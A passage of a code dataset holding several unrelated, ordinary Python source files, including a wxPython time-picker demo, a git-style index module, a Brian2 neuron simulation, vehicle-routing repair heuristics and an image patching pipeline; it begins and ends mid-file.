wx.DefaultPosition, (-1,h), wx.SP_VERTICAL )\n self.time24 = masked.TimeCtrl(\n self, -1, name=\"24 hour control\", fmt24hr=True,\n spinButton = spin2\n )\n self.addWidgets([text2, self.time24, spin2])\n\n text3 = wx.StaticText( self, -1, \"No seconds\\nor spin button:\")\n self.spinless_ctrl = masked.TimeCtrl(\n self, -1, name=\"spinless control\",\n display_seconds = False\n )\n self.addWidgets([text3, self.spinless_ctrl])\n\n self.SetSizer(self.mainSizer)\n\n #----------------------------------------------------------------------\n def addWidgets(self, widgets):\n \"\"\"\"\"\"\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n for widget in widgets:\n if isinstance(widget, wx.StaticText):\n sizer.Add(widget, 0, wx.ALL|wx.CENTER, 5),\n else:\n sizer.Add(widget, 0, wx.ALL, 5)\n self.mainSizer.Add(sizer)\n\n########################################################################\nclass MyFrame(wx.Frame):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title=\"Spinner Demo\")\n panel = MyPanel(self)\n self.Show()\n\nif __name__ == \"__main__\": \n app = wx.App(False)\n f = MyFrame()\n app.MainLoop()","repo_name":"jamespsw123/CAL-GUI-NEW","sub_path":"practice/timepicker.py","file_name":"timepicker.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74916112761","text":"from .lockfile\t\t\t\timport Lockfile\nfrom index.entry \t\t\timport Entry\nimport common.util\nfrom collections\t\t\timport namedtuple\nimport struct\nimport hashlib\n\nclass Index:\n\tHEADER_SIZE \t= 12\n\tHEADER_FORMAT\t= '>4s2i'\n\tSIGNATURE\t\t\t= b'DIRC'\n\tVERSION\t\t\t\t= 2\n\t\n\tENTRY_FORMAT\t\t= '>10I20sH{}sx'\n\tENTRY_BLOCK\t\t\t= 8\n\tENTRY_MIN_SIZE \t= 64\n\t \n\tdef __init__(self, pathname):\n\t\tself.pathname = pathname\n\t\tself.lockfile = Lockfile(pathname, binary=True)\n\t\tself.clear()\n\t\t\n\tdef clear(self):\n\t\tself.entries = dict()\n\t\tself.parents = dict()\n\t\tself.changed = False\n\t\t\n\tdef open_index_file(self):\n\t\ttry:\n\t\t\treturn open(self.pathname, 'r+b')\n\t\texcept FileNotFoundError:\n\t\t\treturn None\n\t\t\t\n\tdef read_header(reader):\n\t\tdata = reader.read(Index.HEADER_SIZE)\n\t\tsignature, version, count = struct.unpack(Index.HEADER_FORMAT, data)\n\t\t\n\t\tif not signature == Index.SIGNATURE:\n\t\t\traise Invalid(f'Signature: expected {Index.SIGNATURE} but found {signature}')\n\t\tif not version == Index.VERSION:\n\t\t\traise Invalid(f'Version: expected {Index.VERSION} but found {version}')\n\t\t\t\n\t\treturn count\n\t\t\n\tdef read_entries(self, reader, count):\n\t\tfor i in list(range(count)):\n\t\t\tentry_bytes = reader.read(Index.ENTRY_MIN_SIZE)\n\t\t\t\n\t\t\twhile not entry_bytes[-1:] == b'\\x00':\n\t\t\t\tentry_bytes += reader.read(Index.ENTRY_BLOCK)\n\t\t\t\t\n\t\t\tentry = Entry.parse(entry_bytes)\n\t\t\tself.store_entry(entry)\n\t\t\t\t\n\tdef store_entry(self, entry):\t\n\t\tself.entries[entry.key()] = entry\n\t\t\n\t\tfor dir in entry.parent_directories():\n\t\t\tif not dir in self.parents:\n\t\t\t\tself.parents[dir] = set()\n\t\t\t\t\n\t\t\tself.parents[dir].add(entry.key())\n\t\t\n\tdef add(self, pathname, oid, stat):\n\t\tentry = Entry(pathname, oid, stat)\n\t\tself.discard_conflicts(entry)\n\t\tself.store_entry(entry)\n\t\tself.changed = True\n\t\t\n\tdef discard_conflicts(self, entry):\n\t\tfor parent in entry.parent_directories():\n\t\t\tself.remove_entry(parent)\n\t\tself.remove_children(entry.key())\n\t\t\t\t\n\tdef remove_children(self, path):\n\t\tif path in self.parents:\n\t\t\tchildren = self.parents[path].copy()\n\t\t\tfor child in children:\n\t\t\t\tself.remove_entry(child)\n\t\n\tdef remove_entry(self, pathname):\n\t\tif pathname in self.entries:\n\t\t\tentry = self.entries[pathname]\n\t\t\tdel self.entries[entry.key()]\n\t\t\t\n\t\t\tfor dir in entry.parent_directories():\n\t\t\t\tself.parents[dir].discard(entry.key())\n\t\t\t\tif len(self.parents[dir]) == 0:\n\t\t\t\t\tdel self.parents[dir]\n\t\n\tdef each_entry(self, function):\n\t\tif function is None:\n\t\t\tsorted_items = sorted(self.entries.items(), key = lambda x: x[0])\n\t\t\tresult = map(lambda x: x[1], sorted_items)\n\t\telse:\n\t\t\tresult = map(lambda x: function(self.entries[x].asBytes()), sorted(self.entries))\n\t\t\n\t\treturn list(result)\n\t\t\t\t\n\tdef write_updates(self):\n\t\tif not self.changed:\n\t\t\treturn self.lockfile.rollback()\n\t\t\n\t\twriter = Checksum(self.lockfile)\n\t\t\n\t\theader = struct.pack(Index.HEADER_FORMAT, Index.SIGNATURE, 2, len(self.entries))\n\t\t\t\t\t\n\t\twriter.write(header)\n\t\tself.each_entry(writer.write)\n\t\t\n\t\twriter.write_checksum()\n\t\tself.lockfile.commit()\n\t\tself.changed = False\n\t\t\n\tdef load_for_update(self):\n\t\tself.lockfile.hold_for_update()\n\t\tself.load()\n\t\t\t\n\tdef load(self):\n\t\tself.clear()\n\t\ttry:\n\t\t\twith self.open_index_file() as file:\n\t\t\t\tif file:\n\t\t\t\t\treader = Checksum(file)\n\t\t\t\t\tcount = Index.read_header(reader)\n\t\t\t\t\tself.read_entries(reader, count)\n\t\t\t\t\treader.verify_checksum()\n\t\texcept AttributeError:\n\t\t\tpass\t#OK if index file does not exist\n\t\t\t\n\tdef release_lock(self):\n\t\tself.lockfile.rollback()\n\t\t\n\t\t\nclass Checksum:\n\tCHECKSUM_SIZE = 20\n\t\n\tdef __init__(self, file):\n\t\tself.file = file\n\t\tself.digest = hashlib.sha1()\n\t\n\tdef read(self, size):\n\t\tdata = self.file.read(size)\n\t\t\n\t\tif len(data) < size:\n\t\t\traise EndOfFile('Unexpected end-of-file while reading index')\n\t\t\n\t\tself.digest.update(data)\n\t\treturn data\n\t\n\tdef verify_checksum(self):\n\t\tsum = self.file.read(Checksum.CHECKSUM_SIZE)\n\t\tif not sum == self.digest.digest():\n\t\t\traise Invalid('Checksum does not match value stored on disk')\n\t\t\t\n\tdef write(self, bytes):\n\t\tself.file.write(bytes)\n\t\tself.digest.update(bytes)\n\t\t\n\tdef write_checksum(self):\n\t\thex_bytes = bytes.fromhex(self.digest.hexdigest())\n\t\tself.file.write(hex_bytes)\n\t\n\nclass EndOfFile(Exception):\n\tpass\n\t\nclass Invalid(Exception):\n\tpass\n\t\t\n\t\n","repo_name":"baumhoto/pit","sub_path":"pit/core/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11604835776","text":"from brian2 import *\nfrom model_larva import Model\nimport numpy as np\nfrom AttrDict import AttrDict\nfrom stimulus import gamma\nfrom joblib import Parallel, delayed\nfrom elephant.spike_train_generation import homogeneous_gamma_process\nfrom quantities import Hz as qHz\nfrom quantities import ms as qms\n\n\nsafe = True\nsave_path = \"path\"\n\n\n\n\nParameters = dict(\n\n # sparseness mechanisms\n lateral_inhibition_enabled=1, # 0 or 1\n APL_inhibition= 0, # 0 or 1\n KC_SFA=0.05* nS, # conductance adaptation\n ORN_SFA= 0.1 * nS, # conductance adaptation\n\n # Neuron Parameters\n C=100 * pF, # capacitance \n CMBON = 100*pF, # capacitance MBON \n CKC=30 * pF, # capacitance KC\n CPN=30 * pF, # capacitance PN\n CLN=30 *pF,# capacitance LN\n CAPL=200 * pF, # capacitance APL\n \n gL=5 * nS, # leak conductance \n gLKC=0.5 * nS, # leak conductance KC\n gLPN=2.5 * nS, # leak conductance PN\n EL=-60 * mV, # leak potential\n ELPN=-59 * mV, # leak potential PN\n ELLN=-59 * mV, # leak potential LN\n ELKC=-55 * mV, # leak potential KC\n \n VT=-35 * mV, # spike threshold \n VTPN=-30 * mV, # spike threshold PN\n VTLN=-30 * mV, # spike threshold LN\n VTKC=-35 * mV, # spike threshold KC\n VTAPL=-30 * mV, # spike threshold APL\n Vr=-60 * mV, # resting potential\n VrPN=-59 * mV, # resting potential PN\n VrLN=-59 * mV, # resting potential LN\n VrKC=-55 * mV, # resting potential KC\n VrAPL=-60 * mV, # resting potential APL\n\n tau_ref=2 * ms, # refractory time \n delay_KCAPL=0 * ms, # synaptic delay\n delay_APLKC=0 * ms,\n \n\n # Dimensions\n N_glo=21,\n ORNperGlo=1,\n N_KC=72,\n \n\n # Synaptic Parameters\n Ee=0 * mV, # excitatory synaptic potential\n Ei=-75 * mV, # inhibitory synaptic potential\n tau_syn_e=5 * ms, # excitatory synaptic time constant\n tau_syn_i=10 * ms, # inhibitory synaptic time constant\n\n # # weights \n wORNinputORN=3 * nS, wORNPN=30 * nS, wORNLN=9 * nS,\n wLNPN=2 * nS, wPNKC=1 * nS, wKCAPL=50 * nS, wAPLKC=100 * nS,\n\n # Adptation current Parameters\n tau_Ia = 1000*ms, \n EIa = -90*mV, \n\n # simulation\n dt = 0.1*ms)\n\n\n\n\n\n\ndef experiment(Parameters,filename):\n\n # set up model architecture\n NG,c = Model(Parameters)\n\n # create input stimulus (odor)\n odor_pattern = gamma()\n\n\n spike_times = []\n spike_index = []\n\n for neuron, value in enumerate(odor_pattern):\n spikes = homogeneous_gamma_process(10.0, (250* 10.0) * qHz, 0 * qms, 6000 * qms,as_array=True) # spontaneous activity\n for elem in spikes:\n spike_times.append(elem)\n spike_index.append(neuron)\n spikes = homogeneous_gamma_process(10.0, (value * 10.0) * qHz, 2000 * qms, 4000 * qms,as_array=True) #value\n for elem in spikes:\n spike_times.append(elem)\n spike_index.append(neuron)\n\n # input to SpikeGeneratorGroup is cleaned up to remove multiple spikes of one neuron during a dt\n spike_index = np.array(spike_index)\n spike_times = np.array(spike_times)\n spike_times = np.around(spike_times,decimals=1) \n\n\n temp_index = []\n temp_times = []\n for i, elem in enumerate(np.unique(spike_index)):\n spike_times_temp = spike_times[spike_index == elem]\n clean_spike_times = np.unique(spike_times_temp, return_index=True)[0]\n temp_times.extend(clean_spike_times)\n [temp_index.append(elem) for x in clean_spike_times]\n\n spike_times = temp_times\n spike_index = temp_index\n\n # input activation of ORNs\n NG['ORNinput'] = SpikeGeneratorGroup(Parameters['N_glo'], spike_index, spike_times * ms)\n input = SpikeMonitor(NG['ORNinput'])\n\n # ORNinput- ORN synapse\n\n c['ORNinputORN'] = Synapses(NG['ORNinput'], NG['ORN'], 'w : siemens', on_pre='g_e+=w')\n for i in np.arange(Parameters.get('N_glo')):\n c['ORNinputORN'].connect(i=list(range(i * Parameters.get('ORNperGlo'), (i + 1) * Parameters.get('ORNperGlo'))), j=i)\n c['ORNinputORN'].w = Parameters.get('wORNinputORN')\n\n\n\n # monitors\n\n spikemonitors = dict()\n\n spikemonitors['spikeORN'] = SpikeMonitor(NG['ORN'])\n spikemonitors['spikePN'] = SpikeMonitor(NG['PN'])\n spikemonitors['spikeLN'] = SpikeMonitor(NG['LN'])\n spikemonitors['spikeKC'] = SpikeMonitor(NG['KC'])\n spikemonitors['spikeAPL'] = SpikeMonitor(NG['APL'])\n\n\n\n\n # setup network\n\n net = Network(NG.values(),c.values())\n\n net.add(spikemonitors)\n\n\n # Running the simulation\n ParaWithLocals = dict()\n ParaWithLocals.update(Parameters)\n ParaWithLocals.update(locals())\n\n net.run(6000 * ms, namespace=ParaWithLocals)\n\n if safe:\n\n\n spikemons = dict()\n\n spikemons['spikeORN'] = AttrDict({'i': spikemonitors['spikeORN'].i[:],\n 't': spikemonitors['spikeORN'].t[:]})\n spikemons['spikePN'] = AttrDict({'i': spikemonitors['spikePN'].i[:],\n 't': spikemonitors['spikePN'].t[:]})\n spikemons['spikeLN'] = AttrDict({'i': spikemonitors['spikeLN'].i[:],\n 't': spikemonitors['spikeLN'].t[:]})\n spikemons['spikeKC'] = AttrDict({'i': spikemonitors['spikeKC'].i[:],\n 't': spikemonitors['spikeKC'].t[:]})\n spikemons['spikeAPL'] = AttrDict({'i': spikemonitors['spikeAPL'].i[:],\n 't': spikemonitors['spikeAPL'].t[:]})\n\n spikemons = AttrDict(spikemons)\n\n\n data = {'spikemons': spikemons,\n 'Parameters': Parameters,\n }\n\n\n\n d = AttrDict(data)\n\n np.savez(os.path.join(save_path,filename), data=d)\n\n\n \n\n\n##### data collection #####\n\nsample = np.arange(1)\n\nParallel(n_jobs=len(sample))(delayed(experiment)(Parameters=Parameters, filename=f\"Larva_{animal:02}\")for animal in sample)\n\n\n\n\n\n\n\n\n\n","repo_name":"nawrotlab/DrosophilaOlfactorySparseCoding","sub_path":"experiment_larva.py","file_name":"experiment_larva.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71700048440","text":"import tkinter\n\ndef TextFilter(_event=None):\n \"\"\"Filter function for text input\"\"\"\n return None\n\nclass NumericFilter(object):\n \"\"\"\n Class for numeric filtering\n\n This filter can only limit new input to the field, not validate the\n ending expression.\n \"\"\"\n\n DIGITS = \"0123456789\"\n # Some control characters need special handlling\n CONTROL = [\"BackSpace\"]\n\n def __init__(self, signed=True, fractional=False):\n self.allow_always = self.DIGITS\n self.control_chars = self.DIGITS\n self.allow_once = \"\"\n if signed:\n self.allow_once += \"-\"\n if fractional:\n self.allow_once += \".\"\n self.text_var = None\n\n def __eq__(self, other):\n if not isinstance(other, self.__class__):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __call__(self, event=None):\n if event.char in self.DIGITS:\n return None\n if event.keysym in self.CONTROL:\n return None\n if not event.char:\n print(\"Error: Uncaught control symbol {}\".format(event.keysym))\n return \"break\"\n if self.text_var:\n # Look for an instance in the text already\n text = self.text_var.get()\n if not any(filter_char in text for filter_char in self.allow_once):\n # Not present, allow\n return None\n elif event.char in self.allow_once:\n # Treat it as always allowed when no text var link\n return None\n return \"break\"\n\nclass Text(tkinter.Entry):\n \"\"\"Filtering text control\"\"\"\n\n def __init__(self, master, **kwargs):\n tkinter.Entry.__init__(self, master=master, **kwargs)\n self.filter_fn = TextFilter\n self.bind(\"\", self.filter_fn)\n self.text_var = kwargs.get(\"textvariable\", None)\n\n def set_filter(self, filter_fn):\n \"\"\"Set the function which will do the filtering for this control\"\"\"\n\n # pylint: disable=W0143\n if self.filter_fn == filter_fn:\n return\n\n if isinstance(filter_fn, NumericFilter):\n # Link the text variable to the filter\n filter_fn.text_var = self.text_var\n\n def _filter_cb(event=None):\n return filter_fn(event)\n\n self.bind(\"\", _filter_cb)\n","repo_name":"dpkristensen/globifest","sub_path":"Globiconfig/FilterText.py","file_name":"FilterText.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2101899762","text":"from utils import *\nimport numpy as np\nimport random\n\ndef regret_value(costs, x_ik, q):\n \"\"\"\n Computes the regret value for each node in a solution.\n\n Parameters:\n costs (np.array): matrix of costs for each node in each route\n\n x_ik (np.array): matrix of indices of the q lowest costs for each node\n\n q (int): number of lowest costs to consider\n\n Outputs:\n regrets (np.array): vector of regret values for each node\n \"\"\"\n\n least_cost = costs[:, 0][:, np.newaxis]\n regrets = np.sum(costs[:, 1:q+1] - least_cost, axis=1)[:, np.newaxis]\n return regrets\n\ndef length_checker(routes, nodes, dists, max_length, args):\n \"\"\"\n Checks if a list of nodes can be inserted into a list of routes without\n violating the maximum route length constraint.\n\n Parameters:\n routes (list): list of routes\n\n nodes (list): list of nodes to insert\n\n dists (np.array): distance matrix\n\n max_length (float): maximum route length\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n lengths (np.array): matrix of lengths of routes with nodes inserted\n\n lengths_bool (np.array): matrix of booleans indicating whether a route is too long\n\n length_info (list): list of tuples containing information about the insertion\n of each node into each route\n \"\"\"\n\n lengths = np.zeros((len(nodes), len(routes)))\n length_info = []\n\n for i, node in enumerate(nodes):\n info = []\n for j, route in enumerate(routes):\n obj, _, route = add_node_to_route(node, route, dists)\n lengths[i, j] = obj\n info.append((obj, i, j, route))\n length_info.append(info)\n lengths_bool = np.where(lengths <= max_length, 1, 0)\n return lengths, lengths_bool, length_info\n\ndef k_regret(old_solution, nodes_to_insert, dists, instance_length_info, regret_num, args):\n \"\"\"\n Applies the k-regret insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n q = regret_num\n length_type, max_length = instance_length_info\n solution = old_solution.copy()\n too_long = []\n check = False\n while nodes_to_insert:\n if length_type == 'vertices':\n route_lengths = np.array([len(r) for r in solution])\n route_too_long = np.where(route_lengths + 1 > max_length)[0]\n if len(route_too_long):\n route_too_long = list(route_too_long)\n for idx in sorted(route_too_long, reverse=True):\n too_long.append(solution[idx])\n del solution[idx]\n else:\n lengths, lengths_bool, length_info = length_checker(solution, nodes_to_insert,\n dists, max_length, args)\n\n routes_too_long_dists = np.sum(lengths_bool, axis=1)\n permissable_sum = np.sum(routes_too_long_dists)\n check = False\n\n if permissable_sum == 0:\n solution.append([])\n\n elif any(routes_too_long_dists > len(solution) - q + 1): #or permissable_sum != 0:\n non_zeros = np.where(routes_too_long_dists > 0)[0]\n lowest = non_zeros[routes_too_long_dists[non_zeros].argmin()]\n\n changes = min(length_info[lowest], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n continue\n\n else:\n x = {}\n info = []\n costs = np.array([])\n nodes_cost = {}\n nodes_info = {}\n for i, k in np.argwhere(lengths_bool == 1):\n obj, _, route = add_node_to_route(nodes_to_insert[i],\n solution[k], dists)\n if i not in nodes_cost:\n nodes_cost[i] = [obj]\n nodes_info[i] = [[obj, i, k, route]]\n\n else:\n nodes_cost[i] = nodes_cost[i] + [obj]\n nodes_info[i] = nodes_info[i] + [[obj, i, k, route]]\n if len(nodes_cost[i]) < q:\n pass\n else:\n x[i] = np.argsort(np.array(nodes_cost[i]))[:q]\n\n for i in nodes_cost:\n nodes_cost[i] = np.sort(np.array(nodes_cost[i]))\n\n regrets = {}\n for i in nodes_cost:\n regrets[i] = np.sum(nodes_cost[i][1:q+1] - nodes_cost[i][0])\n\n max_regret = max(regrets, key=regrets.get)\n\n changes = min(nodes_info[max_regret], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n continue\n\n\n\n if len(nodes_to_insert) and solution == []:\n solution.append([])\n\n x = np.zeros((len(nodes_to_insert), q))\n total_info = []\n total_costs = np.zeros((len(nodes_to_insert), len(solution)))\n\n for i, node in enumerate(nodes_to_insert):\n info = []\n i_costs = np.array([])\n for k, route in enumerate(solution):\n obj, _, route = add_node_to_route(node, route, dists)\n i_costs = np.append(i_costs, np.array([obj]))\n info.append((obj, i, k, route))\n if len(i_costs) < q:\n pass\n else:\n x[i] = np.argsort(i_costs)[:q]\n total_costs[i] = i_costs\n total_info.append(info)\n sorted_costs = np.sort(total_costs)\n max_regrets = np.argmax(regret_value(sorted_costs, x, q))\n\n\n changes = min(total_info[max_regrets], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n\n if len(too_long):\n solution = solution + too_long\n\n return solution\n\ndef random_insertion(old_solution, nodes_to_insert, dists, length_info,\n regret_num, args):\n \"\"\"\n Applies the random insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n length_type, max_length = length_info\n solution = old_solution.copy()\n\n\n for node in nodes_to_insert:\n if length_type == 'vertices':\n candidates = [route for route in solution if len(route) < max_length]\n else:\n _, candidate_matrix, _ = length_checker(solution, nodes_to_insert, dists, max_length, args)\n permissable = np.where(np.all(candidate_matrix, axis=0))[0]\n\n if permissable.size == 0:\n candidates = False\n else:\n candidates = [solution[i] for i in permissable]\n\n if candidates:\n route = random.choice(candidates)\n else:\n route = [node]\n solution.append(route)\n continue\n\n place_in_route = random.randint(0, len(route))\n route.insert(place_in_route, node)\n\n return solution\n\ndef greedy_insertion(old_solution, nodes_to_insert, dists, length_info,\n regret_num, args):\n \"\"\"\n Applies the greedy insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n length_type, max_length = length_info\n solution = old_solution.copy()\n route_too_long = [False if len(r) < max_length else True for r in solution]\n\n while nodes_to_insert:\n c = np.zeros((len(nodes_to_insert), len(solution)))\n info = [[] for _ in range(len(nodes_to_insert))]\n for i, node in enumerate(nodes_to_insert):\n for k, route in enumerate(solution):\n if length_type == 'vertices':\n if len(route) >= max_length:\n obj, place_in_route = np.inf, None\n route_too_long[k] = True\n else:\n place = add_node_to_route(node, route, dists)\n obj, place_in_route, route = place\n else:\n obj, place_in_route, route = add_node_to_route(node, route, dists)\n if obj >= max_length:\n obj, place_in_route = np.inf, None\n route_too_long[k] = True\n\n info[i].append((place_in_route, route))\n c[i, k] = obj\n\n if all(route_too_long) and nodes_to_insert != []:\n route_too_long.append(False)\n solution.append([nodes_to_insert.pop(0)])\n continue\n\n\n if all(flatten(np.isinf(c))):\n return solution, nodes_to_insert\n n, r = np.unravel_index(c.argmin(), c.shape)\n solution[r] = info[n][r][1]\n nodes_to_insert.pop(n)\n return solution\n\ndef add_node_to_route(node, route, dists):\n \"\"\"\n Adds a node to a route in its best place.\n\n Parameters:\n node (int): node to insert\n\n route (list): route to insert node into\n\n dists (np.array): distance matrix\n\n Outputs:\n best_place (tuple): tuple containing the best place to insert the node and the\n route with the node inserted\n \"\"\"\n\n positions = len(route)+1\n objectives = []\n\n for i in range(positions):\n cur_route_nodes = route[:i] + [node] + route[i:]\n cur_route_edges = route_to_edges([0] + cur_route_nodes + [0])\n objectives.append((objective(cur_route_edges,\n dists, route=True), i, cur_route_nodes))\n\n return min(objectives, key=lambda x:x[0])\n","repo_name":"jenstrolle/masters-thesis-code","sub_path":"mvctpy/repair_heuristics.py","file_name":"repair_heuristics.py","file_ext":"py","file_size_in_byte":11170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24463605983","text":"#!/usr/bin/env python3\n'''\nConvert Ilastik project files (ilp) to Tiff files.\n\nUsage:\n convert_ilp_to_tif.py []\n\n'''\nfrom docopt import docopt\n\nimport re\nimport os\nimport sys\n\nimport lib\n\nimport numpy as np\nimport skimage.io\n\ndef main(ilp_filepath, image_path):\n output_path = ilp_filepath+'-tiffs'\n try:\n os.mkdir(output_path)\n except:\n pass\n\n print('Writing output to {}...'.format(output_path))\n for path, (img, labels, _) in lib.read_project(ilp_filepath, image_path=image_path, prediction=False):\n fname = lib.basename(path)\n\n skimage.io.imsave(os.path.join(output_path, fname+'-img.tif'), img)\n skimage.io.imsave(os.path.join(output_path, fname+'-lbl.tif'), labels)\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version='convert_ilp_to_tif 0.1')\n ilp_path = args['']\n image_path = args['']\n\n try:\n main(ilp_path, image_path)\n except FileNotFoundError as e:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n print('!!! Maybe you can fix this error specifying the path to the images using the option !!!')\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n raise e\n\n","repo_name":"yapic/pyilastik","sub_path":"pyilastik/convert_ilp_to_tif.py","file_name":"convert_ilp_to_tif.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32105976752","text":"import sys\ninput = sys.stdin.readline\n\ndef sol(l,w,h,cube):\n if not cube or min(l,w,h)<=0:\n return\n global cnt\n length = 2**cube[-1][0]\n if length <= min(l,w,h):\n cube[-1][1]-=1\n cnt+=1\n if cube[-1][1]==0:\n cube.pop()\n sol(l,w,h-length,cube)\n sol(l,w-length,h,cube)\n sol(l-length,w,h,cube)\n else:\n cube.pop()\n sol(l,w,h,cube)\n\nl,w,h = map(int,input().split())\nn = int(input())\ncube=[]\ncnt =0\nfor i in range(n):\n a,b=map(int,input().split())\n cube.append([a,b])\n\nsol(l,w,h,sorted(cube))\nprint(cnt)\n\n\n\n\n\n\n","repo_name":"sue06004/py_code","sub_path":"분할정복/1493.py","file_name":"1493.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74771123639","text":"with open('nouv.txt', 'r') as fnouv:\n lignes_nouv = list(fnouv.readlines())\n\nwith open('nouv_corr.txt', 'r') as cnouv:\n lignes_corr = list(cnouv.readlines())\n\nwith open('correction.txt', 'w') as f:\n for ln, lc in zip(lignes_nouv, lignes_corr):\n n = ln.split(',')[1].strip()\n c = lc.split(',')[1].strip()\n f.write('{},{}\\n'.format(n, c))\n ","repo_name":"lemairecarl/fautquonseparle","sub_path":"py/correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31052543093","text":"from typing import Any, List\nfrom PIL import Image\nfrom torch import tensor,stack\nfrom transformations.transformation import Transformation\nfrom torchvision.transforms import ToTensor, ToPILImage\n\n\nclass Pipeline:\n def __init__(self, transformation_list: List[Transformation], patch_size_list: List[int], crop:bool=True):\n self.transformation_list=transformation_list\n self.patch_size_list=patch_size_list\n self.incremental_list=[]\n self.crop=crop\n\n def __call__(self, img: Image.Image) -> List[Image.Image]:\n transformed_img_list=[]\n for p in self.patch_size_list:\n padded_img=self.pad_img(img=img, patch_size=p)\n transformed_img=self.patch_and_transform(img=padded_img, patch_size=p)\n if self.crop:\n transformed_img=transformed_img.crop((0,0,self.width,self.height))\n transformed_img_list.append(transformed_img)\n\n return transformed_img_list\n\n def pad_img(self, img: Image.Image, patch_size: int) -> List[Image.Image]:\n width, height = img.size\n self.width=width\n self.height=height\n\n # Calculate the amount of padding needed\n pad_width = (width // patch_size + 1) * patch_size - width\n pad_height = (height // patch_size + 1) * patch_size - height\n\n # Create a new blank image with the desired dimensions\n padded_img = Image.new(img.mode, (width + pad_width, height + pad_height), color='white')\n\n # Paste the original image onto the padded image\n padded_img.paste(img, (0, 0))\n\n return padded_img\n\n def patch_and_transform(self, img: Image.Image, patch_size: int) -> List[Image.Image]:\n patches = []\n width, height = img.size\n\n for y in range(0, height - patch_size + 1, patch_size):\n for x in range(0, width - patch_size + 1, patch_size):\n patch = img.crop((x, y, x + patch_size, y + patch_size))\n patches.append(patch)\n\n patches_tensor=stack([ToTensor()(p) for p in patches])\n for transformation in self.transformation_list:\n patches_tensor=transformation(patches_tensor, patch_size=patch_size)\n\n new_patches = [ToPILImage()(patches_tensor[i]) for i in range(patches_tensor.size(0))]\n\n recombined_img = img.copy()\n\n new_incremental=[img.copy()]\n\n patch_index = 0\n for y in range(0, height - patch_size + 1, patch_size):\n for x in range(0, width - patch_size + 1, patch_size):\n transformed_patch = new_patches[patch_index]\n recombined_img.paste(transformed_patch, (x, y))\n if self.crop:\n new_incremental.append(recombined_img.copy().crop((0,0,self.width,self.height)))\n else:\n new_incremental.append(recombined_img.copy())\n patch_index += 1\n self.incremental_list.append(new_incremental)\n return recombined_img\n \n def get_incremental_list(self):\n return self.incremental_list","repo_name":"jamesBaker361/hobai","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42176715361","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools.float_utils import float_is_zero\n\nclass LandedCost(models.Model):\n _inherit = 'stock.landed.cost'\n\n analytic_tag_id = fields.Many2one(\n 'account.analytic.tag', string=\"Analytic tag\",\n help=\"Analytic tag associated with the invoice. E.g. DIN1\")\n\n @api.depends('cost_lines.price_unit')\n def _compute_total_amount(self):\n for cost in self:\n prec_digits = self.env.company.currency_id.decimal_places\n cost.amount_total = sum(round(line.price_unit,prec_digits) for line in cost.cost_lines)\n\n def compute_landed_cost(self):\n AdjustementLines = 